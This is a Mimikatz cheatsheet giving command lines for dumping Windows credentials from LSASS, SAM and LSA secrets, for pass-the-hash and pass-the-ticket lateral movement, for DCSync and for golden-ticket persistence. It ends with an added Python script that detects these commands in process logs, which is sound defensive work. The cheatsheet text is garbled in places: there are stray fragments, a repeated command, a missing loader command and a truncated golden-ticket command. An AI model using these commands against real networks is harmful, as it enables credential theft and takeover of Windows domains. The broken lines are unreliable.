Mimikatz Cheatsheet (Jun 2026)

Load Mimikatz directly into memory without touching disk.

This command displays information about logged-on users and their associated security identifiers.

```
sekurlsa::logonpasswords
```

lsass.exe process.

```
sekurlsa::logonpasswords
```

Dump Local SAM Database: Retrieves NTLM hashes for local users.

```
lsadump::sam
```

Dump LSA Secrets: Extracts cached credentials, service account passwords, and DPAPI keys.

```
lsadump::secrets
```

3. Lateral Movement Attacks

Once you have hashes or tickets, use them to move across the network without knowing the plaintext password.

Pass-The-Hash (PtH): Starts a new process (e.g., cmd.exe) using a user's NTLM hash.

```
sekurlsa::pth /user:Administrator /domain:DOMAIN.LOCAL /ntlm:HASH_HERE /run:cmd.exe
```

Pass-The-Ticket (PtT): Injects a Kerberos ticket (.kirbi file) into your current session.

```
kerberos::ptt "C:\path\to\ticket.kirbi"
```

Over-Pass-The-Hash: Upgrades an NTLM hash into a Kerberos ticket.

```
sekurlsa::pth /user:TargetUser /domain:DOMAIN.LOCAL /ntlm:HASH_HERE /aes256:AES_KEY /run:powershell.exe
```

4. Active Directory Persistence

High-level attacks used to maintain long-term access to a domain.

DCSync Attack: Mimics a Domain Controller to pull password hashes for any user (requires specialized permissions).

```
lsadump::dcsync /domain:DOMAIN.LOCAL /user:krbtgt
```

Golden Ticket Forgery: Creates a ticket-granting ticket (TGT) that grants Domain Admin access for up to 10 years.

```
kerberos::golden /user:Administrator /domain:DOMAIN.LOCAL /sid:S-
```
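For defenders, the module::command strings listed above are a detection signal when they appear in process-creation logs (for example Windows Security event 4688 with command-line auditing enabled, or Sysmon event 1). The following is an added example, not part of the original cheatsheet: it scans constructed sample events, whose `host` and `cmdline` field names are assumptions, labels each hit with the cheatsheet's category, and redacts key material before it reaches an alert. It only sees commands passed as process arguments, not commands typed into the interactive console.

```python
import re

# Mimikatz module::command tokens taken from this cheatsheet, mapped to the
# category the cheatsheet files them under.
TOKENS = {
    "sekurlsa::logonpasswords": "credential dump (LSASS)",
    "lsadump::sam": "credential dump (SAM)",
    "lsadump::secrets": "credential dump (LSA secrets)",
    "sekurlsa::pth": "pass-the-hash",
    "kerberos::ptt": "pass-the-ticket",
    "lsadump::dcsync": "DCSync",
    "kerberos::golden": "golden ticket",
}
TOKEN_RE = re.compile("|".join(re.escape(t) for t in TOKENS), re.IGNORECASE)
# Arguments whose values are key material and must not be copied into alerts.
SECRET_ARG_RE = re.compile(r"(/(?:ntlm|aes256):)\S+", re.IGNORECASE)


def classify(cmdline):
    """Return sorted category labels for the tokens found in one command line."""
    labels = set()
    for match in TOKEN_RE.finditer(cmdline):
        token = match.group(0).lower()
        label = TOKENS[token]
        # The cheatsheet's over-pass-the-hash form is sekurlsa::pth plus /aes256:
        if token == "sekurlsa::pth" and re.search(r"/aes256:", cmdline, re.I):
            label = "over-pass-the-hash"
        labels.add(label)
    return sorted(labels)


def scan(events):
    """Yield (host, labels, redacted_cmdline) for every matching event."""
    for ev in events:
        labels = classify(ev["cmdline"])
        if labels:
            redacted = SECRET_ARG_RE.sub(r"\1<redacted>", ev["cmdline"])
            yield ev["host"], labels, redacted


# Constructed sample events (field names and values are assumptions).
SAMPLE = [
    {"host": "WS01", "cmdline": 'm.exe "SEKURLSA::LogonPasswords"'},
    {"host": "WS02", "cmdline": 'm.exe "sekurlsa::pth /user:u /domain:D '
                                '/ntlm:aaaa /aes256:bbbb /run:cmd.exe"'},
    {"host": "WS03", "cmdline": "notepad.exe C:\\notes.txt"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

String matching of this kind is a coarse signal and is best paired with behavioural telemetry such as LSASS process-access and directory-replication auditing.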